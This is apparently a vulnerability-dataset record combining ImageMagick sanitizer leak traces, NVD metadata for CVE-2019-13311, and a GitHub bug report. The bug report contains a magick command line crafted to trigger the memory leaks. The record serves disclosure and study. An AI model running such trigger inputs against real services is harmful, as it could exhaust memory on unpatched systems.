#1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f9c4c598084 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7f9c4c594115 in NewSplayTree MagickCore/splay-tree.c:1148:32
#4 0x7f9c4c593d24 in CloneSplayTree MagickCore/splay-tree.c:360:14
#5 0x7f9c4c4698c0 in CloneImageOptions MagickCore/option.c:2144:27
#6 0x7f9c4c3f2018 in CloneImageInfo MagickCore/image.c:1010:10
#7 0x7f9c4c3e7678 in SyncImageSettings MagickCore/image.c:4242:21
#8 0x7f9c4c3fee66 in SyncImagesSettings MagickCore/image.c:4000:12
#9 0x7f9c4bbbc163 in CLIOption MagickWand/operation.c:5246:14
#10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f9c4c57d781 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7f9c4c57cfc3 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7f9c4c16b383 in AcquirePixelCache MagickCore/cache.c:231:30
#4 0x7f9c4c16bf8d in ClonePixelCache MagickCore/cache.c:513:28
#5 0x7f9c4c3eb59f in CloneImage MagickCore/image.c:910:22
#6 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#7 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#8 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#9 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f9c4c57d781 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7f9c4c57cfc3 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7f9c4c16b2f4 in AcquirePixelCache MagickCore/cache.c:229:25
#4 0x7f9c4c16bf8d in ClonePixelCache MagickCore/cache.c:513:28
#5 0x7f9c4c3eb59f in CloneImage MagickCore/image.c:910:22
#6 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#7 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#8 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#9 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f9c4c57d781 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7f9c4c57cfc3 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7f9c4c594389 in NewSplayTree MagickCore/splay-tree.c:1159:25
#4 0x7f9c4c593d24 in CloneSplayTree MagickCore/splay-tree.c:360:14
#5 0x7f9c4c4698c0 in CloneImageOptions MagickCore/option.c:2144:27
#6 0x7f9c4c3f2018 in CloneImageInfo MagickCore/image.c:1010:10
#7 0x7f9c4c3e7678 in SyncImageSettings MagickCore/image.c:4242:21
#8 0x7f9c4c3fee66 in SyncImagesSettings MagickCore/image.c:4000:12
#9 0x7f9c4bbbc163 in CLIOption MagickWand/operation.c:5246:14
#10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f9c4c437f26 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7f9c4c16b4e2 in AcquirePixelCacheNexus MagickCore/cache.c:267:29
#3 0x7f9c4c16af8d in AcquirePixelCache MagickCore/cache.c:212:26
#4 0x7f9c4c16bf8d in ClonePixelCache MagickCore/cache.c:513:28
#5 0x7f9c4c3eb59f in CloneImage MagickCore/image.c:910:22
#6 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#7 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#8 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#9 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 64 byte(s) in 2 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f9c4c593033 in AddValueToSplayTree MagickCore/splay-tree.c:189:21
#3 0x7f9c4c593f3c in CloneSplayTree MagickCore/splay-tree.c:372:12
#4 0x7f9c4c4698c0 in CloneImageOptions MagickCore/option.c:2144:27
#5 0x7f9c4c3f2018 in CloneImageInfo MagickCore/image.c:1010:10
#6 0x7f9c4c3e7678 in SyncImageSettings MagickCore/image.c:4242:21
#7 0x7f9c4c3fee66 in SyncImagesSettings MagickCore/image.c:4000:12
#8 0x7f9c4bbbc163 in CLIOption MagickWand/operation.c:5246:14
#9 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f9c4c57d781 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7f9c4c57cfc3 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7f9c4c3ea99f in CloneImage MagickCore/image.c:871:26
#4 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#5 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#6 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#7 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#8 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#9 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#10 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#11 0x526f95 in MagickMain utilities/magick.c:149:10
#12 0x5268e1 in main utilities/magick.c:180:10
#13 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f9c4c57d781 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7f9c4c57cfc3 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7f9c4c14a1ae in GetBlobInfo MagickCore/blob.c:1745:24
#4 0x7f9c4c149d6a in CloneBlobInfo MagickCore/blob.c:555:3
#5 0x7f9c4c3ea808 in CloneImage MagickCore/image.c:867:25
#6 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#7 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#8 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#9 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f9c4c57d781 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7f9c4c57cfc3 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7f9c4c594389 in NewSplayTree MagickCore/splay-tree.c:1159:25
#4 0x7f9c4c593d24 in CloneSplayTree MagickCore/splay-tree.c:360:14
#5 0x7f9c4c4c8ee3 in CloneImageProperties MagickCore/property.c:196:25
#6 0x7f9c4c3e9f59 in CloneImage MagickCore/image.c:839:10
#7 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#8 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#9 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#10 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#11 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#12 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#13 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#14 0x526f95 in MagickMain utilities/magick.c:149:10
#15 0x5268e1 in main utilities/magick.c:180:10
#16 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 62 byte(s) in 3 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f9c4c43816f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f9c4c5cb9d3 in ConstantString MagickCore/string.c:713:26
#4 0x7f9c4c593f26 in CloneSplayTree MagickCore/splay-tree.c:373:7
#5 0x7f9c4c4c8ee3 in CloneImageProperties MagickCore/property.c:196:25
#6 0x7f9c4c3e9f59 in CloneImage MagickCore/image.c:839:10
#7 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#8 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#9 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#10 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#11 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#12 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#13 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#14 0x526f95 in MagickMain utilities/magick.c:149:10
#15 0x5268e1 in main utilities/magick.c:180:10
#16 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 35 byte(s) in 3 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f9c4c43816f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f9c4c5cb9d3 in ConstantString MagickCore/string.c:713:26
#4 0x7f9c4c593ea1 in CloneSplayTree MagickCore/splay-tree.c:372:43
#5 0x7f9c4c4c8ee3 in CloneImageProperties MagickCore/property.c:196:25
#6 0x7f9c4c3e9f59 in CloneImage MagickCore/image.c:839:10
#7 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#8 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#9 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#10 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#11 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#12 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#13 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#14 0x526f95 in MagickMain utilities/magick.c:149:10
#15 0x5268e1 in main utilities/magick.c:180:10
#16 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 16 byte(s) in 2 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f9c4c43816f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f9c4c5cb9d3 in ConstantString MagickCore/string.c:713:26
#4 0x7f9c4c593ea1 in CloneSplayTree MagickCore/splay-tree.c:372:43
#5 0x7f9c4c4698c0 in CloneImageOptions MagickCore/option.c:2144:27
#6 0x7f9c4c3f2018 in CloneImageInfo MagickCore/image.c:1010:10
#7 0x7f9c4c3e7678 in SyncImageSettings MagickCore/image.c:4242:21
#8 0x7f9c4c3fee66 in SyncImagesSettings MagickCore/image.c:4000:12
#9 0x7f9c4bbbc163 in CLIOption MagickWand/operation.c:5246:14
#10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 7 byte(s) in 2 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f9c4c43816f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f9c4c5cb9d3 in ConstantString MagickCore/string.c:713:26
#4 0x7f9c4c593f26 in CloneSplayTree MagickCore/splay-tree.c:373:7
#5 0x7f9c4c4698c0 in CloneImageOptions MagickCore/option.c:2144:27
#6 0x7f9c4c3f2018 in CloneImageInfo MagickCore/image.c:1010:10
#7 0x7f9c4c3e7678 in SyncImageSettings MagickCore/image.c:4242:21
#8 0x7f9c4c3fee66 in SyncImagesSettings MagickCore/image.c:4000:12
#9 0x7f9c4bbbc163 in CLIOption MagickWand/operation.c:5246:14
#10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: 6613792 byte(s) leaked in 32 allocation(s).
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-23 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 ./configure --disable-openmp
<!-- Thanks for reporting the issue to ImageMagick! -->
| memory leaks is detected at AcquireMagickMemory | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1616/comments | 2 | 2019-06-23T08:45:54Z | 2019-07-08T01:55:00Z | https://github.com/ImageMagick/ImageMagick/issues/1616 | 459,551,673 | 1,616 |
CVE-2019-13311 | 2019-07-05T01:15:10.937 | ImageMagick 7.0.8-50 Q16 has memory leaks at AcquireMagickMemory because of a wand/mogrify.c error. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Broken Link",
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/4a334bbf5584de37c6f5a47c380a531c8c4b140a"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1623"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/bb812022d0bc12107db215c981cab0b1ccd73d91"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1623 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There's memory leaks which are detected at AcquireMagickMemory.
This maybe relates with [#1616](https://github.com/ImageMagick/ImageMagick/issues/1616).
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run following cmd:
`magick -seed 0 -label "%r%W&%tZRD%r%A" -units PixelsPerCentimeter -caption "%s%m%w" "(" magick:logo +repage ")" "(" magick:granite -shade 13x85 ")" -compress RLE -combine -ift -complex magnitude-phase tmp`
Here's Asan Log.
```
==26664==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 13504 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f121151bb54 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7f1211520109 in CloneImage MagickCore/image.c:823:25
#4 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17
#5 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#6 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#7 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#8 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#9 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#10 0x526f95 in MagickMain utilities/magick.c:149:10
#11 0x5268e1 in main utilities/magick.c:180:10
#12 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 3686400 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f121156ea36 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7f12112b6ede in OpenPixelCache MagickCore/cache.c:3732:46
#3 0x7f12112bd1c1 in GetImagePixelCache MagickCore/cache.c:1756:18
#4 0x7f12112c35b9 in SyncImagePixelCache MagickCore/cache.c:5499:28
#5 0x7f12115222c1 in SetImageStorageClass MagickCore/image.c:2627:10
#6 0x7f12112ce980 in CombineImages MagickCore/channel.c:523:7
#7 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#8 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#9 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 22616 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f121156ec7f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f121152153d in CloneImage MagickCore/image.c:879:43
#4 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17
#5 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#6 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#7 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#8 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#9 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#10 0x526f95 in MagickMain utilities/magick.c:149:10
#11 0x5268e1 in main utilities/magick.c:180:10
#12 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 13024 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f121151bb54 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7f121151e193 in AcquireImageInfo MagickCore/image.c:350:28
#4 0x7f1211526f53 in CloneImageInfo MagickCore/image.c:945:14
#5 0x7f121151e0b8 in SyncImageSettings MagickCore/image.c:4242:21
#6 0x7f12115358a6 in SyncImagesSettings MagickCore/image.c:4000:12
#7 0x7f1210d081a3 in CLIOption MagickWand/operation.c:5249:14
#8 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#9 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#10 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#11 0x526f95 in MagickMain utilities/magick.c:149:10
#12 0x5268e1 in main utilities/magick.c:180:10
#13 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 9152 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f121156ea36 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7f12112a11d4 in AcquirePixelCache MagickCore/cache.c:195:28
#3 0x7f12112a275d in ClonePixelCache MagickCore/cache.c:515:28
#4 0x7f12112bcf3b in GetImagePixelCache MagickCore/cache.c:1724:29
#5 0x7f12112c35b9 in SyncImagePixelCache MagickCore/cache.c:5499:28
#6 0x7f12115222c1 in SetImageStorageClass MagickCore/image.c:2627:10
#7 0x7f12112ce980 in CombineImages MagickCore/channel.c:523:7
#8 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#9 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
